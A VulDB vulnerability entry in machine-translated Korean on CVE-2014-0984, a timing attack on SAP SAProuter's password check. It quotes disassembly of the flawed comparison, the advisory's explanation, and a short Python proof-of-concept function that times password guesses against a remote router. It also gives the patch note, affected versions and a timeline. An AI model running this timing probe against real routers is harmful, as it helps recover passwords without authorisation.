VDB-13005 · CVE-2014-0984 · CORE-2014-0003

SAP SAProuter 까지 721 Patch Level 117 Password Authentication passwordCheck 권한 상승

CVSS 메타 임시 점수	현재 익스플로잇 가격 (≈)	CTI 관심 점수
5.9	$0-$5k	0.00

요약정보

해당 취약점이 비판적인로 분류되어 SAP SAProuter 까지 721 Patch Level 117에서 발견되었습니다. 영향을 받은 것은 passwordCheck 함수이며 구성 요소 Password Authentication에 속함. 이 조작 수행될 때 권한 상승을(를) 초래합니다. 이 취약점은 CVE-2014-0984로 거래됩니다. 또한, 익스플로잇이 존재합니다. 이 문제를 수정하기 위해 패치를 적용하는 것이 좋습니다.

세부정보

해당 취약점이 비판적인로 분류되어 SAP SAProuter 까지 721 Patch Level 117에서 발견되었습니다. 영향을 받은 것은 passwordCheck 함수이며 구성 요소 Password Authentication에 속함. 이 조작 수행될 때 권한 상승을(를) 초래합니다. 이 문제는 CWE를 통해 CWE-264로 선언되었습니다. 이 취약성은 공개되었습니다 2014. 04. 15. Martin Gallo에 의해 Core Security Consulting Services와 함께 CORE-2014-0003로 권고로 (웹사이트). 권고는 coresecurity.com에서 다운로드용으로 공유되었습니다. 공급업체와의 협의를 거쳐 공개가 진행되었습니다.

이 취약점은 CVE-2014-0984로 거래됩니다. CVE 할당은 2014. 01. 07. 에 이루어졌습니다. 기술적 정보가 있습니다. 이 취약점의 인기도는 평균 이하입니다. 또한, 익스플로잇이 존재합니다. 익스플로잇이 공개되어 대중이 사용할 수 있습니다. 지금 시점에서 이 익스플로잇의 가격은 약 USD $0-$5k일 수 있습니다. MITRE ATT&CK 프로젝트는 공격 기법을 T1068 로 선언합니다. 이 취약점의 원인은 아래의 코드 일부입니다:

.text:0000000140005BE0 loc_140005BE0:                          ; CODE XREF: passwordCheck+191j
.text:0000000140005BE0                 movzx   ecx, byte ptr [rdi] ; rdi points to the routtab password
.text:0000000140005BE3                 movzx   eax, byte ptr [rdi+rsi] ; rdi+rsi points to the user-supplied password
.text:0000000140005BE7                 sub     ecx, eax
.text:0000000140005BE9                 jnz     short loc_140005BF3 ; password check failed
.text:0000000140005BEB                 add     rdi, 1
.text:0000000140005BEF                 test    eax, eax
.text:0000000140005BF1                 jnz     short loc_140005BE0
.text:0000000140005BF3
.text:0000000140005BF3 loc_140005BF3:                          ; CODE XREF: passwordCheck+189j
.text:0000000140005BF3                 test    ecx, ecx
.text:0000000140005BF5                 jz      short loc_140005C3F
.text:0000000140005BF7                 cmp     cs:trace_level, 1
.text:0000000140005BFE                 jl      short loc_140005C38
.text:0000000140005C00                 call    DpLock
.text:0000000140005C05                 mov     rcx, cs:qword_140273BC0
.text:0000000140005C0C                 lea     r8, aPasswordcheck ; "passwordCheck"
.text:0000000140005C13                 lea     rdx, aSPasswordCheck ; "%s: password check failed\n"
.text:0000000140005C1A                 mov     cs:dword_1401ADAA4, 1
.text:0000000140005C24                 call    DpTrace
.text:0000000140005C29
.text:0000000140005C29 loc_140005C29:                          ; CODE XREF: passwordCheck+16Fj
.text:0000000140005C29                 mov     cs:dword_1401ADAA4, 2
.text:0000000140005C33                 call    DpUnlock
.text:0000000140005C38
.text:0000000140005C38 loc_140005C38:                          ; CODE XREF: passwordCheck+135j
.text:0000000140005C38                                         ; passwordCheck+19Ej
.text:0000000140005C38                 mov     eax, 0FFFFFFA2h
.text:0000000140005C3D                 jmp     short loc_140005C41
.text:0000000140005C3F ; ---------------------------------------------------------------------------
.text:0000000140005C3F
.text:0000000140005C3F loc_140005C3F:                          ; CODE XREF: passwordCheck+12Cj
.text:0000000140005C3F                                         ; passwordCheck+174j ...
.text:0000000140005C3F                 xor     eax, eax        ; password check succeeded

보안 권고문은 다음과 같이 언급합니다:

SAP Router permits and/or forbids networks connections based on a Route Permission Table. Entries in the Route Permission Table can have a password. If a password is specified for a given entry in the Route Permission Table, SAP Router checks whether the user-supplied password matches with the one in the Route Permission Table entry before permitting a connection. The vulnerable function passwordCheck performs a non-constant time string comparison for checking the user-supplied password against the on in the Route Permission Table. On the first non-matched character, the string comparison function immediately interrupts the evaluation cycle, which may let an attacker perform timing attacks.

개념 증명로 선언됩니다. coresecurity.com에서 익스플로잇이 공유되어 다운로드가 가능합니다. 취약점은 최소 46일 동안 비공개 제로데이 익스플로잇으로 취급되었습니다. 0-day로서의 예상 지하 시장 가격은 $5k-$25k 정도였습니다. 익스플로잇에 사용된 코드는 다음과 같습니다:

def try_password(options, password, output=None, k=0):
 
    p = SAPRouter(type=SAPRouter.SAPROUTER_ADMIN, version=options.router_version)
    p.adm_command = 2
    p.adm_password = password
    p = str(SAPNI() / p)
 
    fau_timer.init()
    fau_timer.send_request(options.remote_host, options.remote_port, p, len(p))
    fau_timer.calculate_time()
    cpuSpeed = fau_timer.get_speed()
    cpuTicks = fau_timer.get_cpu_ticks()
    time = fau_timer.get_time()
 
    if options.verbose:
        print "Request time: CPU Speed: %s Hz CPU Ticks: %s Time: %s nanosec" % (cpuSpeed, cpuTicks, time)
 
    # Write the time to the output file
    if output:
        output.write("%i,%s,%s\n" % (k, password, time))
 
    return time

패치의 이름은 SAP Note 1986895입니다. 버그 수정이 service.sap.com에서 다운로드할 수 있습니다. 이 문제를 수정하기 위해 패치를 적용하는 것이 좋습니다.

이 취약점은 다른 취약점 데이터베이스에도 문서화되어 있습니다: Secunia (SA57993).

영향 있음

SAP Router release 721 Patch Level 117
SAP Router release 720 Patch Level 411
SAP Router release 710 Patch Level 029

제품정보

유형

Router Operating System

공급 업체

이름

SAProuter

버전

721 Patch Level 117

특허

웹사이트

공급 업체: https://www.sap.com/

CPE 2.3정보

CPE 2.2정보

CVSSv4정보

VulDB 벡터: 🔍
VulDB 신뢰성: 🔍

CVSSv3정보

VulDB 메타 베이스 점수: 6.5
VulDB 메타 임시 점수: 5.9

VulDB 기본 점수: 6.5
VulDB 임시 점수: 5.9
VulDB 벡터: 🔍
VulDB 신뢰성: 🔍

CVSSv2정보

AV	AC	Au	C	I	A
💳	💳	💳	💳	💳	💳
💳	💳	💳	💳	💳	💳
💳	💳	💳	💳	💳	💳

벡터	복잡성	인증	기밀성	진실성	유효성
잠금 해제하다	잠금 해제하다	잠금 해제하다	잠금 해제하다	잠금 해제하다	잠금 해제하다
잠금 해제하다	잠금 해제하다	잠금 해제하다	잠금 해제하다	잠금 해제하다	잠금 해제하다
잠금 해제하다	잠금 해제하다	잠금 해제하다	잠금 해제하다	잠금 해제하다	잠금 해제하다

VulDB 기본 점수: 🔍
VulDB 임시 점수: 🔍
VulDB 신뢰성: 🔍

NVD 기본 점수: 🔍

악용정보

수업: 권한 상승
CWE: CWE-264
CAPEC: 🔍
ATT&CK: 🔍

물리적인: 아니요
현지: 아니요
원격: 네

유효성: 🔍
접근: 공개
상태: 개념 증명
저자: Martin Gallo
프로그래밍 언어: 🔍
다운로드: 🔍

EPSS Score: 🔍
EPSS Percentile: 🔍

가격 예측: 🔍
현재 가격 추정: 🔍

0-Day	잠금 해제하다	잠금 해제하다	잠금 해제하다	잠금 해제하다
오늘	잠금 해제하다	잠금 해제하다	잠금 해제하다	잠금 해제하다

Exploit-DB: 🔍

위협 인텔리전스정보

관심: 🔍
활성 배우: 🔍
활성 APT 그룹: 🔍

대책정보

추천: 패치
상태: 🔍

반응 시간: 🔍
0일 시간: 🔍
익스플로잇 지연 시간: 🔍

패치: SAP Note 1986895

타임라인정보

2014. 01. 07. 🔍
2014. 02. 20. +44 날 🔍
2014. 02. 20. +0 날 🔍
2014. 04. 07. +46 날 🔍
2014. 04. 15. +8 날 🔍
2014. 04. 15. +0 날 🔍
2014. 04. 16. +1 날 🔍
2014. 04. 17. +1 날 🔍
2014. 04. 17. +0 날 🔍
2024. 08. 15. +3773 날 🔍

출처정보

공급 업체: sap.com

권고: CORE-2014-0003
연구원: Martin Gallo
조직: Core Security Consulting Services
상태: 정의되지 않음
확인: 🔍
조정된: 🔍

CVE: CVE-2014-0984 (🔍)
GCVE (CVE): GCVE-0-2014-0984
GCVE (VulDB): GCVE-100-13005
Secunia: 57993 - SAProuter Password Timing Attack Weakness, Not Critical

scip Labs: https://www.scip.ch/en/?labs.20150716
또한 보십시오: 🔍

항목정보

만들어진: 2014. 04. 17. PM 02:22
업데이트됨: 2024. 08. 15. PM 01:47
변경 사항: 2014. 04. 17. PM 02:22 (80), 2019. 04. 01. PM 02:26 (1), 2024. 08. 15. PM 01:47 (16)
완벽한: 🔍
Cache ID: 216:C58:103

논의

아직 댓글이 없습니다. 언어: ko + en.

댓글을 작성하려면 로그인하세요.

◂ 이전 개요 다음 ▸

Want to stay up to date on a daily basis?

Enable the mail alert feature now!